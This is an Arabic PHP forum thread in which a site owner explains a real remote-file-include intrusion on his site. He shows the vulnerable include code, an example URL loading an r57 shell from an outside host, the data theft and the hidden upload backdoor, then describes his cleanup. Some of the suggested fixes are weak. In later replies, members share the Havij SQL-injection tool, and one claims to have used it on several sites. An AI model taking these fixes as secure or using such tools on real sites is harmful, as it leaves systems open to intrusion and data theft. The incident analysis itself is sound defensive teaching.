اشترك في مجموعة montadaphp.net حتى تصلك أخبار المنتدى  

بريدك الإلكتروني:

صفحة 1 من 3 123 الأخيرةالأخيرة
النتائج 1 إلى 20 من 53
شجرة الإعجاب4إعجاب

الموضوع: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

  1. #1
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    بسم الله الرحمن الرحيم

    شرح الأستاذ
    vista-design آخر عملية إختراق حدثت لموقعة حتى لا يقع أحد في هذه الثغرة ونقلت لكم هذا الشرح ليستفيد الجميع
    __________________________________________________ _________________________


    السلام عليكم ورحمة الله وبركاته

    اولا:أعتذر عن اغلاق الموقع طيلة الأيام السابقة ,نظرا كما أخبرتكم بان الموقع تعرض لعملية اختراق,وتعد هذه هى المره الثالثه التى يتعرض فيها الموقع للاختراق,ولكن هذه المره المخترق شخص مختلف عن الباقى الذى يهوون القيام بمثل هذه العمليات ,ليس هذا فقط,هذا الانسان يتميز بصدق النية فقط راسلنى هذا الشخص وأخبرنى بكل تفاصيل ما حدث,وعلى الرغم من انه حدث مشاداه بينى وبينه فى بادىء الأمر, لان ما حدث ليس بالامر الهين ,الا انه فى النهاية تم حل الموضوع وتقبل كل منا سوء الخلاف,وانتهى هذا الموضوع ولله الحمد,لكن بالرغم من ان ماحدث كان له أثر سلبى على موقعنا,لكن أقولها بصراحة أن عملية الاختراق الاخيره أعجبنى أسلوبها ,وكيف تمت ,فعملية الاختراق كان مجهز لها جيدا,ومخطط لما سيتم عمله قبل أن يتم تنفيذها,وهذا فى حد ذاته أعجبنى,لان أشخاص كثيرون يخترقوا اى موقع حتى يضعوا اندكس بصفحة سوادء عليها اسم المخترق وتجد العبارة المشهورة HACKED BY او OWNED ,اما ما حدث لموقعنا كان مختلف بعض الشىء,لذلك أحببت أن أسرد لكم قصة عملية الاختراق الاخيره وكيف تمت ,وأنا أغلقت الموقع طيلة هذه الفترة لاننى كنت اجمع معلومات عن كل ما حدث وأقوم بمسح شامل على كافة الملفات ومجلدات الموقع ,حتى أسرد لكم هذه القصه الشيقه بطريقه جيده ,وكتابتى للموضوع غرضها الأفاده ,وكما تعلمون اننا هنا فى منبر علم ,نحب أن نوصل اى معلومة قد تفيد الأخرين,حتى لو لم يكن لها علاقة بالبرمجة .


    ملاحظه:كل ما سأسرده فى الشرح تم معرفة بعض المعلومات من المخترق +اجتهاد شخصى منى بتتبع ما حدث عن طريق مراجعة ملفات log والتواريخ ,ومعرفة ما تم تغييره .........


    نبدأ الان بوضع الخريطه العامه لما حدث مرتبه كخطوات ,وكما قلت هو مجرد اجتهاد شخصى منى لسلسه الاحداث:
    المرحلة الأولى:مرحلة اختراق الموقع :1-كيف تم التخطيط لاختراق الموقع ؟2-مرحلة اكتشاف ثغرة remote file include3-مرحلة انكلود r57shell على السيرفر4-مرحلة سحب قواعد البيانات باستخدام MYSQL INTERFACE5-ما تم انجازه من الهجوم على مواقعنا6-حقن backdoor لتكرار عملية الاختراق فيما بعد مره اخرى
    المرحلة الثانية:مرحلة تحليل عملية الاختراق وما ينبغى عمله كصاحب موقع:1-مرحلة تتبع تواريخ الدخول لمجلدات وملفات الموقع2-مرحلة تتبع ملفات error_log وكيفية الاستفاده من الأخطاء البرمجية3-مرحلة البحث عن backdoor

    4-اعادة توزيع تصاريح المجلدات والملفات
    5-اعادة تغيير بيانات الاتصال بقاعدة البيانات
    6-مخاطبة صاحب السيرفر او نقل الاستضافة
    نبدأ على بركة الله ..........المرحلة الأولى : اختراق الموقع :اولا:كيف تم التخطيط لاختراق الموقع :دائما عندما يريد اى شخص تنفيذ اى شىء,لابد أن يخطط له جيدا لينجزه بشكل سليم ,وذكرت سابقا أن ما أعجبنى فى عملية الاختراق الاخيره هو التخطيط الجيد من قبل المخترق,فعندما قرر المخترق الوصول لموقعنا,قام بدراسة ما تم تركيبه على موقعنا من اسكربتات ,ليس هذا فقط,بل قام بتتبع المواقع الموجوده على نفس السيرفر الذى عليه موقعنا ليبحث عن اى ثغرة برمجية تساعده للوصول لموقعنا,وهذا بالفعل ما تم عمله ,وسأسرد لكم كيف يمكن للثغرات البرمجية أن تهدد مستقبل موقعك .ثانيا:مرحلة اكتشاف ثغرة remote file include :للثغرات البرمجية أنواع كثيره ,ولكن من أخطر الثغرات التى تمكن المخترق من التحرك الأكبر على السيرفر هى ثغرة remotre file include ,لان بكل بساطة هذه الثغرة تمكن المخترق من انكلود لملفات برمجية خبيثه من خارج السيرفر وعمل انكلود لها على السيرفر لقراءة اى شىء على السيرفر ,وسبق قد شرحت هذه الثغرة من خلال هذا الدرسالموجود هــــــنـــــــــا ,وشرحت كيف يقع المبرمج فى هذه الثغرة .
    لكن الكل سيسأل سؤال؟لماذا تم اختراق الموقع بالرغم انى على دراية بهذه الثغرة وكيف اتفادى الوقوع فيها؟
    ليس لاننى أعلم هذه الثغرة أننى لست عرضه لها لان توجد على موقعنا او على السيرفر,فليس كل الملفات الموجوده على الموقع لم أقم ببرمجتها,وأيضا الاسكربتات الاخرى الموجوده على اى موقع اخر موجوده على نفس السيرفر الموجود عليه موقعنا لم أقم ببرمجتها,لذلك بسبب عدم فحصى لما أقوم بتركيبه على السيرفر من اسكربتات لم أقم ببرمجتها ,او عدم فحص صاحب السيرفر لاى اسكربت موجود عليه ,فهذا فى حد ذاته السبب الرئيسى لوجود ثغرة remote file include على الموقع او السيرفر.بصراحة على الرغم من ان الثغرة سببها فى الاصل المبرمج,الا ان هناك تقصير منى وخطا منى أننى أهملت جزئية فحص اى ملفات اقوم بتركيبها على الموقع وهى ليست من برمجتى,ولعل السبب فى ذلك هو انشغالى بالتركيز على محتوى الموقع ,وايضا عدم وجود الوقت الكافى لعمل ذلك,نظرا لاننى أتولى مسئولية الموقع لوحدىطيب الأن,نريد أن نعرف كيف وصل وجد المخترق ثغرة RFi ؟عندما يريد اى مخترق البحث عن اى ثغرة فى اى موقع ,فكل ما يقوم بعمله ,هو معرفة أسماء الأسكربتات الموجوده على الموقع ,ثم يقوم بالاستعانه بأحد مواقع السيكيورتى المشهوره مثل securityfocus للبحث عن اى ثغرة تخص الاسكربت المثبت على الموقع المراد اختراق,ولكن إذا كان الاسكربت ليس بشهره واسعه ,او لم يسبق بأن قام احد بفحصه من الثغرات ,فإن المخترق يبحث عن اى رابط تحميل لتحميل الاسكربت على جهازه ,ثم يبدأ فى فحص وقراءة السورس كود الخاص بجميع ملفاته ,محاولا ايجاد اى ثغرة برمجية ..............تمام,الان نريد أن نعرف كيف وجد المخترق الثغرة البرمجية ؟رغم اننى لا أعرف بالظبط الثغرة التى من خلالها تم الوصول لموقعنا,الا اننى سأجتهد وسأشرح على افتراض ان الثغرة هى الثغرة الموجوده فى اسكربت الاختبارات والتدريب المثبت على موقعنا.لقد راسلنى المخترق بعد عملية الاختراق,وأخبرنى بمكان الثغرة ,والثغرة بعيدا عن ذكر مكانها,الا اننى أريد شرح الكود البرمجى الموجود به هذه الثغرة بما اننا فى منبر تعليم البرمجة ,والكود الذى به ثغرة remote file include كان :
    كود PHP:
    if($_GET['action']=='getpage' && !empty($_GET['page'])){                                @include_once($_GET['page'].'.php');                             }else{                                echo getContents($db,'my_panel');                            } 
    الكود واضح فعلا انه غير أمن ,لان الجملة تقول انه لو تم جلب المتغير action بحيث قيمته getpage ,والمتغير page بحيث ان قيمته غير فارغه ,سيتم عمل انكلودinclude_once لاى ملف بأى اسم مضافا له اللاحقه php. ,وهنا يكمن الضعف الامنى,فللاسف المبرمج لم يقم بتأمين عملية الانكلود ,لانه هكذا جعل عملية انكلود اى ملف بأى اسم مفتوحه وليست مقتصره على اى ملف ,لذلك يمكن للمخترق استغلال هذه الجزئية بعمل انكلود لاى ملف خبيث,وبالفعل أنا جربتها شخصيا على جهازى ,وكانت النتيجة كما ترون :


    فكما ترون ,فقد جلبت الملف الذى يستخدمه المخترق وهو الشل من خلال هذا الضعف الأمنى
    قبل ترك هذه الجزئيه ,لابد أن أشرح لكم كيف نقوم بتأمين هذا الأنكلود بشكل أمن ؟سوف أشرح هذه الجزئيه بشكل عام للفائده ,حتى تطبقها على اى كود ليس هذا فقط,اولا,قبل عملية التأمين ,لابد أن تفهم وظيفة الكود,وتفهم بالأخص ما هى قيمة المتغير الذى سيأخذها فى شريط المتصفح ,فمثلا قد تكون قيمة المتغير التى سيأخذها فى شريط المتصفح قيمة رقمية ,فيمكن بكل بساطة تأمين المتغير بالتحقق من انه قيمه رقميه باستخدام دالة is_numeric ,واذا كانت قيمة المتغير عبارة عن String ,فالموضوع سيحتاج مجهود أكبر,وهذا ما سنقوم بعمله فى الكود الخاص بنا,لان للاسف الانكلود السابق,يعطى قيمة المتغير page قيمة على هيئة String وليس قيمة رقمية ,والstring هنا هو اسم الصفحة المراد عمل انكلود لها,لذا لابد هنا فى عملية التأمين أن نفهم جيدا كيف نمنع عمل اى انكلود خارجى ,ويوجد حلول كثيره يمكن عملها ,سأستعرض بعض الأمثله لتأمين ذلك :

    1-التأمين باستخدام دالة str_replace:
    يمكن استخدام الدالة فى عملية التأمين فالمخترق عندما يريد عمل انكلود لملف خارجى ,سيضع الرابط بهذا الشكل:localhost/train/vuln.php?action=getpage&page=http://site.org/r57لذا ,يمكن باستخدام هذه الدالة التشويش على الرابط ,بحيث يمكننا أخذ اى مقطع منه واستبداله باى شىء,لتعطيل الرابط من العمل ,على سبيل المثال,يمكن عمل الاتى فى تأمين الانكلود:
    كود PHP:
    $secure=str_replace("http","nothing",$_GET['page']);                      @include_once($secure.'.php');                           } 
    فى الكود السابق سيتم استبدال اى مسار به http بكلمة nothing فى قيمة المتغير pageويمكن التأمين اكثر واستبدال www اذا حاول المخترق كتابة الرابط بدون http اوhttps
    2-التأمين باستخدام دالة htmlspecialchars :
    راسلنى الاخ العزيز L0n3ly-H34rT من فترة,وتفضل مشكورا بوضع الترقيع الخاص بهذه الثغرة وثغرات أخرى,وكان الترقيع معتمد فيه على دالة htmlsepcialchars التى تحول جميع predefined characters مثل (.) او (؟) لمدخلات html مثل & او middot&
    كود PHP:
    @include_once(basename(htmlspecialchars($_GET['page'])).'.php'); 
    ويوجد طرق كثيره للتأمين ,فالتأمين ما هو مجرد فكر مبرمج ليس اكثر او أقل.....


    ثالثا:مرحلة انكلود shell على السيرفر:بعد ما تعرفنا على الثغرة التى سيستغلها المخترق فى عملية اختراقه ,الان نريد أن نعرف ما قام المخترق بعمله من خلال هذه الثغره ,ثغرة RFI كما قلت تمكن المخترق من عمل انكلود لملف خارجى على سيرفر الموقع ,واسم الثغره يوضح ذلكremote file include ,لذلك من أهم ما يقوم به اى مخترق فى هذه النقطه ,هو استدعاء ملف برمجى خبيث يستخدمه المخترق فى عملية اختراقه ,وهذا الملف يسموه shell ,وهو عبارة عن ملف php تم برمجته خصيصا ليساعد المخترق من خلال عرض ملفات الموقع ,والتنقل على مواقع السيرفر,واستغلال الدوال المفتوحة على السيرفر فى قراءة وتعديل اى ملفات ......,وأيضا بعض الشل بها خاصية الاتصال بقاعدة البيانات للتخاطب معها...وهذه صورة ملف الشل,وجدتها على الموقع :

    فى المرحلة الخامسة ,سأشرح ما تم انجازه وما قام به المخترق من خلال استخدام هذا الشل


    رابعا:مرحلة سحب قواعد البيانات باستخدام MYSQL INTERFACe :بعد ما انتهى المخترق من جلب ملف shell على السيرفر,اول ما سيفكر به هو مخاطبة قواعد البيانات ,لان قاعدة البيانات هى أهم جزء يهتم به المخترق,فمحتوى الموقع من بيانات الاعضاء والأدمن وووالخ ,كلها موجوده فى db ,ولكن حتى يستطيع المخترق الاتصال بقاعدة البيانات,لابد أن يملك أو يعرف بيانات الاتصال,ولفعل ذلك,يتصفح المخترق جميع ملفات الموقع ,حتى يصل لملف اعدادات الاتصال بقاعدة البيانات ,لكن أحيانا قد يعوق المخترق قراءة هذا الملف بسبب التصريح الموجود على هذا الملف,ويقوم بتخطيه مستغلا أحد الدوال المفتوحه على السيرفر معتمدا على الشيل الذى استخدمه .بعد أن توصل لملف اعدادات الاتصال ,ياتى هنا دور ملف mysql interface ,وهو أيضا ملف شبيه بالشل ,يستخدمه المخترقون للتواصل مع قاعدة البيانات,وهذه صوره له :


    بعد الاتصال بقاعدة البيانات,يستطيع المخترق من خلال هذا الملف أخذ باك اب لاى قاعدة بيانات دخل عليها,بحيث بعد ذلك يركبها على جهازه ,ويتجول فيها ليستخرج اى بيانات قد تهمه .

    خامسا:ما تم انجازه من الهجوم على مواقعنا:
    حتى لا أطيل فى هذه النقطه ,فبإختصار أستطاع المخترق من عمل الاتى :

    1-سحب باك أب لجميع قواعد البيانات المثبته على موقعنا2-التنقل لأحد المواقع التابعه لنا وهو موقع الاسكربت Aradown وسحب جميع ملفاته وقواعد البيانات الخاصه به3-سحب الملفات المهمه والتصاميم4-زرع backdoor ليستخدمه فيما بعد فى حال أراد اختراق الموقع مره أخرى .
    سادسا:حقن backdoor لتكرار عملية الاختراق فيما بعد مره اخرى:الbackdoor او الباب الخلفى باختصار هو عبارة عن كود خبيث يقوم المخترق بزرعه فى اى ملف داخل ملفات الموقع ,وهذا الكود وظيفته هو أن يساعده فى اختراق الموقع مره أخرى فيما بعد اذا قام صاحب الموقع بتأمين موقعه بعد عملية الاختراق الأولى ,متجاهلا هذا الكود الخبيثوهذا الكود الخبيث له صور وأشكال متعدده ,سأسرد بعضها:
    1-زرع كود خبيث على هيئة ثغرة RemoteFileInclude يقوم هو بصنعها ليستغلها فى اختراق الموقع2-زرع كود خبيث على هيئة ثغرة local file include يقوم هو بصنعها ليستغلها فى اختراق الموقع3-زرع كود خبيث على هيئة فورم رفع ملفات يقوم هو بصنعه ليتمكن من رفع اى ملف على الموقع
    وفى موضوعنا,استخدم المخترق الحالة الثالثه ,حيث قام بزرع كود رفع ملفات فى أحد ملفات الموقع ,ليس هذا فقط ,بل قام بتشفير هذا الكود ,لصعوبة الوصول اليه والبحث عنه,وهذا صورة لهذا الكود:


    المرحلة الثانية:مرحلة تحليل عملية الاختراق وما ينبغى عمله كصاحب موقع:
    بعد ما تعرفنا على المرحلة الأولى وتعرفنا فيها على كافة تفاصيل عملية الاختراق,حان الأن الانتقال لمرحلة تحليل عملية الاخترق وما دورك كصاحب موقع لعمل اللازم حيال ذلك.......اولا:مرحلة تتبع تواريخ الدخول لمجلدات وملفات الموقع:اول ما تفكر به عندما يتعرض موقعك للاختراق,هو تتبع تواريخ الدخول لمجلدات الموقع,لان هذه النقطه ستمكنك من معرفة ما قام به المخترق من تعديلات على ملفات موقعك,وبالنسبة لى ,أستخدام برنامج Ftp لمعرفة ذلك ,وهذه صورة توضح تواريخ اخر تعديل على مجلدات الموقع :

    من هذه التواريخ ,يمكنك معرفة اخر تعديل تم على الملف,فمثلا تمت عملية الاختراق بتاريخ 10-8-2012 ,فما عليك هو البحث عن اى مجلد او ملف تم تعديله بهذا التاريخ ,او بيوم او يومين قبله ,لتعرف ان هناك تعديلا ما حدث على هذا الملف.

    ثانيا:مرحلة تتبع ملفات error_log وكيفية الاستفاده من الأخطاء البرمجية:ملف error_log ,من الأشياء المهمه ,خصوصا للمبرمج,فهذا الملف يسجل الأخطاء البرمجيه التى حدثت على موقعك ,من محاولة استخدام أحد الدوال فى عملية الاختراق,ولتعرفوا مدى أهميتها,هذه صورة لاحد الأخطاء البرمجية التى وجدتها فى ملف log ,وفيها حاول المخترق مستخدما الشل استخدام دالة open_basedir حتى يتمكن من الوصول لملف بيانات الدخول للسى بانل الخاصة بالموقع الموجوده داخل ملف etc/passwd ,لكن الدالة معطلة على السيرفر

    ثالثا:مرحلة البحث عن backdoor :
    كما ذكرت سابقا,فقد قام المخترق بزرع باك دور فى احد ملفات الموقع ,حتى يستغله فيما بعد ,وما جعلنى انتبه لهذا الباك دور هو وجوده فى الرئيسية على هيئة فورم رفع ملفات ,كما لاحظت تغير فى تاريخ تعديل الملف الخاص باظهار رئيسية الموقع,لكن حقيقة كشف هذا الباك دور أخذ منى وقت ,لاننى توصلت لذلك بعد ساعات من العمل على الموقع,فقد بدأت أولا على اساس ان هذا الفورم يمكن البحث عنه باستخدام احد البرامج المختصه بالبحث فى السورس كود بحيث لو كتبت اى جزء من كود الفورم وليكن <form> سوف أصل اليه سريعا,لكن للاسف لم يظهر لى اى نتيجه ,فتأكدت أن المخترق قام بتشفير كوده لتضليل وزيادة صعوبة ايجاده,فقمت باخذ باك اب لكافة ملفات الموقع ,وفحصتها جميعا,وبعد ساعات ,توصلت لهذا الكود الخبيث المشفر الذى كان مزروع فى أحد components المتعلقه بالمجله ,وهذه صوره للكود مشفرا:

    قمت بحذف هذا الكود لتعود الأمور لطبيعتها........
    رابعا:اعادة توزيع تصاريح المجلدات والملفات:بعد مراجعة كافة الملفات التى تم تعديلها من قبل المخترق,وكافة المجلدات التى تم الدخول اليها ومراجعتها,قمت اولا بحذف ملف الشل وملف الاتصال بقاعدة البيانات ,وملفات كانت مخبأه داخل مجلدات الموقع ,ثم قمت بتغيير التصاريح لتأمينها أكثر.
    خامسا: اعادة تغيير بيانات الاتصال بقاعدة البيانات:أكيد بعد ما حدث,فالمخترق يمتلك بيانات قاعدة البيانات,لذلك من المهم تغيير اليوزر والباسورد الخاص بها,وقمت بالذهاب من خلال cpanel,بتغيير بيانات الاتصال بقاعدة البيانات
    سادسا:مخاطبة صاحب السيرفر او نقل الاستضافة:بعد ذلك من المفروض مخاطبة الشركة المستضيفه بذلك ,او أخذ القرار بنقل الاستضافة ,ولكن بالنسبة لى ,للاسف لا أستطيع النقل حاليا,لانى أغطى تكاليف الموقع بجانب موقعين اخرين تابعين لنا .أرجو أن يكون الموضوع فيه الأفاده لكم ,وكما ذكرت,الغرض من الموضوع هو نشر العلم ,على العلم أن ما حدث بينى وبين المخترق تم حله والله الحمد,وكان انسان متفاهم ,فنحن جميعا أخوة فى الاسلام .......وأخير ,كل عام وأنتم بخير بمناسبة عيد الفطر المبارك ,أعاده الله علينا باليمن والبركات...


    التعديل الأخير تم بواسطة mohmedelwany ; 21-08-2012 الساعة 06:04 PM
    يارب احفظ مصر من كل سوء

  2. #2
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    جمييييييييييييل جدا, الريموت فيل انكلود معروفه انها ثغرة بنت ستين في سبيعن.
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

  3. #3
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    اقتباس المشاركة الأصلية كتبت بواسطة mesaber مشاهدة المشاركة
    جمييييييييييييل جدا, الريموت فيل انكلود معروفه انها ثغرة بنت ستين في سبيعن.
    ثغرة تجنن
    يارب احفظ مصر من كل سوء

  4. #4
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    اكيد, لكن الاخطر منها SQL Injection و XSS
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

  5. #5
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    اقتباس المشاركة الأصلية كتبت بواسطة mesaber مشاهدة المشاركة
    اكيد, لكن الاخطر منها SQL Injection و XSS
    بس دي حلها أهو
    كود PHP:
    $user $_POST['username']; $user mysql_real_escape_string($user); $query "select email from user where user='$user'"$sql = @mysql_query($query); 
    يارب احفظ مصر من كل سوء

  6. #6
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    ال****رز دايما بتخطوا الحماية بتاعتها, لو انت فاكر ان ده حلها, اقولك لازم تقرا اكتر
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

  7. #7
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    أيوة انا فاهمك بس دي لحماية المتغيرات ومشفتش حد عداها قبل كدة
    وهسمع بنصيحتك وهدور أكتر
    يارب احفظ مصر من كل سوء

  8. #8
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    طيب هاسهل عليك, ممكن تقرا عن blind sql injection
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

  9. #9
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    من غير متسهل عليه عندي مجموعة من الكتب بتعلم فيها من زمان والكود الي أنا حطتها حاجة بسيطة في التأمين وأنا بستخدم الكود دة في حماية المتغيرات ومحدتش عرف يعديه ومش محتاج أكتر منها وفيه بردة برنامج إختراق بسيط كنت بتأكد إني سكربتاتي محمية من RFI
    لو عايز أساميهم أقولهملك
    يارب احفظ مصر من كل سوء

  10. #10
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    يا ريت يا محمد تقولنا على اسمي الكتب الي بتتعلم منها علشان نقرأها و نفيد بعض
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

  11. #11
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    دول مجموعة من الكتب وفيهم الكتاب الي بتعلم منه وهو secure-web-application-development.pdf
    Multiupload.nl - upload your files to multiple file hosting sites!
    ولو عايز برنامج الأختراق أرفعهولك
    يارب احفظ مصر من كل سوء

  12. #12
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    يا سلام عليك يا واد, لو رفعتلي البرنامج تبقى برنس اكتر ما انت برنس
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

  13. #13
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    مفيش روابط فيهم شغالة يا باشا!
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

  14. #14
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    هو multiupload باظ ولا إيه ثواني هرفعهالك على حاجة تاني
    يارب احفظ مصر من كل سوء

  15. #15
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    بما أن multi upload بايظ حمل رفعتهولك على حبيب الملايين
    الكتب
    البرمجة الآمنة.rar
    أما دة شرح لإستغلال الثغرة RFI من الموقع الي بتعلم من عندة التهكير طبعا علشان أأمن نفسي
    درس استغلال ثغرات ال RFi مع التطبيق ---
    ودة برنامج أنا خدتة من عندهم وإسمة
    havij 1.10
    بس مش لاقيلة الشرح
    Havij 1.10.rar
    رفعتهولك أنا من تاني وبيعتمد على الثغرة الي بتكون
    كود PHP:
    ?id=
    وناخد المتغير وندور بية في القاعدة من غير تامين وهنا البرنامج بيلعب وبيقدر يفتح القاعدة وياخد بياناتها ويعدل فيها وكمان في حتة فك تشفير md5 طبعا مش كل التشفيرات إنما التشفيرات المشهورة منها
    perl معجب بهذا .
    يارب احفظ مصر من كل سوء

  16. #16
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    رائع يا ابو حميد, كده ميه ميه, جاري التحميل
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

  17. #17
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    قولي رأيك في البرنامج وعرفت تتعامل معاه ولا محتاج الشرح
    يارب احفظ مصر من كل سوء

  18. #18
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    هههههههههه
    عيب عليك, و ضربت بيه حبة مواقع كمان, شكرا يا باشا
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

  19. #19
    فريق البرمجة والتصميم
    تاريخ التسجيل
    11-08-2010
    السن
    17
    المشاركات
    653
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    هههههه أنت إشتغلت هكر
    يارب احفظ مصر من كل سوء

  20. #20
    عضو شرف
    تاريخ التسجيل
    02-04-2011
    السن
    23
    المشاركات
    678
    معدل تقييم المستوى
    4

    افتراضي رد: شرح عملية الاختراق الأخيرة لموقع advphp بثغرة RFI والتحليل الأمني

    ههههههههههههههههه
    انا بهزر معاك
    أعمالي في تصميم و برمجة المواقع من الأقدم حتى الأن:-

    http://mokatamap.com
    http://www.lyricser.com
    دراجة المقالات

صفحة 1 من 3 123 الأخيرةالأخيرة

معلومات الموضوع

الأعضاء الذين يشاهدون هذا الموضوع

الذين يشاهدون الموضوع الآن: 1 (0 من الأعضاء و 1 زائر)

المواضيع المتشابهه

  1. مشكلة ما الحل لهذه الاختراق
    بواسطة Ahmad Tarek Salah في المنتدى مشاكل وحلول PHP Errors & Troubleshooting
    مشاركات: 2
    آخر مشاركة: 20-11-2011, 06:58 PM
  2. استفسارت بخصوص البرمجة والتحليل ؟
    بواسطة php_haker في المنتدى مشاكل وحلول PHP Errors & Troubleshooting
    مشاركات: 5
    آخر مشاركة: 15-02-2011, 11:42 PM
  3. 8 مشرفين لموقع
    بواسطة uft06 في المنتدى فرصة تجارية
    مشاركات: 0
    آخر مشاركة: 22-12-2010, 01:36 AM
  4. طريقة عمل المشاركة الأخيرة
    بواسطة dna-tnt في المنتدى مشاكل وحلول PHP Errors & Troubleshooting
    مشاركات: 6
    آخر مشاركة: 17-07-2009, 04:24 AM
  5. استفسار التخطيط والتحليل
    بواسطة العلم نور في المنتدى مشاكل وحلول PHP Errors & Troubleshooting
    مشاركات: 3
    آخر مشاركة: 05-06-2009, 10:30 PM

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •